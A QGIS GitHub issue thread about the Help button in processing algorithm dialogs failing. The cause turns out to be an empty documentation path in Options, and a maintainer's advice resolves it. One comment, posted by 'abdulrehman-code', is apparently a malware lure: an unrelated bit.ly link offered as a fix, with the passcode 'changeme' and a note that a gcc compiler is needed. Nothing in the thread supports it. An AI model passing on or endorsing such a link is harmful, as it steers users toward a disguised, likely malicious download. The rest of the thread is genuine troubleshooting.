### ISSUE TITLE
"Help" button in algorithm form does not display help page

### ISSUE THREAD

**Issue by evinouze** [qgis/QGIS#58586]
### What is the bug or the crash?

When I want to go to the help section of a algorithm I want to run (e.g. the algorithm `gdalgridaverage`), I click on the "help" button in the dialog form and QGIS sends back a message that says:
> "Error transferring https://oslandia.gitlab.io/qgis/french_locator_filter/processing_algs/gdal/rasteranalysis.html#gdalgridaverage - server replied: Not Found"

The url prefix references a plugin that is installed in my profile, whether i expect to access to the right documentation page
This problem is the same, regardless of the algorithm you select in the processing toolbox

If I unload this plugin, the uri is '/processing_algs/gdal/rasteranalysis.html#gdalgridaverage' but the problem remains, as no help page seems to appear

### Steps to reproduce the issue

1. Install `French locator filter'
2. Go the menu bar
3. Select menu raster > analysis > gdalgridaverage
4. Click on the "help" button
5. Help page is not displayed
6. See warning from network tab of the log messages
7. Unload `French locator filter` plugin
8. Click on the "help" button
9. Help page is not displayed

### Versions

Version de QGIS | 3.38.2-Grenoble | Branche de code de QGIS | Release 3.38
-- | -- | -- | --
Version de Qt | 5.15.10
Version de Python | 3.11.9
Version de GDAL/OGR | 3.9.2
Version de Proj | 9.4.1
Version de la base de données du registre EPSG | v11.006 (2024-03-13)
Version de GEOS | 3.12.2-CAPI-1.18.2
Version de SQLite | 3.44.2
Version de PDAL | 2.7.2
Version du client PostgreSQL | unknown
Version de SpatiaLite | 5.0.1
Version de QWT | 6.1.5
Version de QScintilla2 | 2.14.1
Version de l'OS | KDE Flatpak runtime
  |   |   |  
Extensions Python actives
Go2NextFeature3 | 2.1
menu_from_project | 2.1.0
changeDataSource | 3.1
SpreadsheetLayers | 2.1.2
TerrainShading | 0.9.5
cadastre | 1.20.0
qwc2_tools | v1.4.1
qtribu | 0.18.0
QuickOSM | 2.2.3
trackable_project_files | v1.2.2
qfieldsync | v4.10.1
attributeBasedClustering | 2.2.1
db_manager | 0.1.20
processing | 2.12.99

</body></html>

### Supported QGIS version

- [X] I'm running a supported QGIS version according to [the roadmap](https://www.qgis.org/en/site/getinvolved/development/roadmap.html#release-schedule).

### New profile

- [ ] I tried with a new [QGIS profile](https://docs.qgis.org/latest/en/docs/user_manual/introduction/qgis_configuration.html#working-with-user-profiles)

### Additional context

This seems not to be related to the plugin, but I keep this explanation in case it gives a clue to the problem

**Comment by abdulrehman-code** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by DelazJ** [comment]
In QGIS Options > System > Documentation path, you should have/add `https://docs.qgis.org/§qgis_short_version/$qgis_locale/docs/user_manual/`.
If it isn't there, either you removed it or the plugins removed it and you should report to the authors. I don't think this is a QGIS issue.

**Comment by DelazJ** [comment]
I made a quick test (3.39): adding the plugin adds a new path for the plugin docs in the Options dialog, removing the plugin removes only their path. The QGIS default one is still there...

**Comment by evinouze** [comment]
> In QGIS Options > System > Documentation path, you should have/add `https://docs.qgis.org/§qgis_short_version/$qgis_locale/docs/user_manual/`. If it isn't there, either you removed it or the plugins removed it and you should report to the authors. I don't think this is a QGIS issue.

I don't remember having removed it and I don't have interest to do such a thing. But the path is effectively empty
If I add it again, it works. Weird...

**Comment by evinouze** [comment]
> I made a quick test (3.39): adding the plugin adds a new path for the plugin docs in the Options dialog, removing the plugin removes only their path. The QGIS default one is still there...

I confirm it. The behavior is hopefully the same.

Note sure the way the issue process is handled here but I can definitely close the ticket myself if asked as my problem is solved.

Thank you very much @DelazJ ! :smiley: :+1:
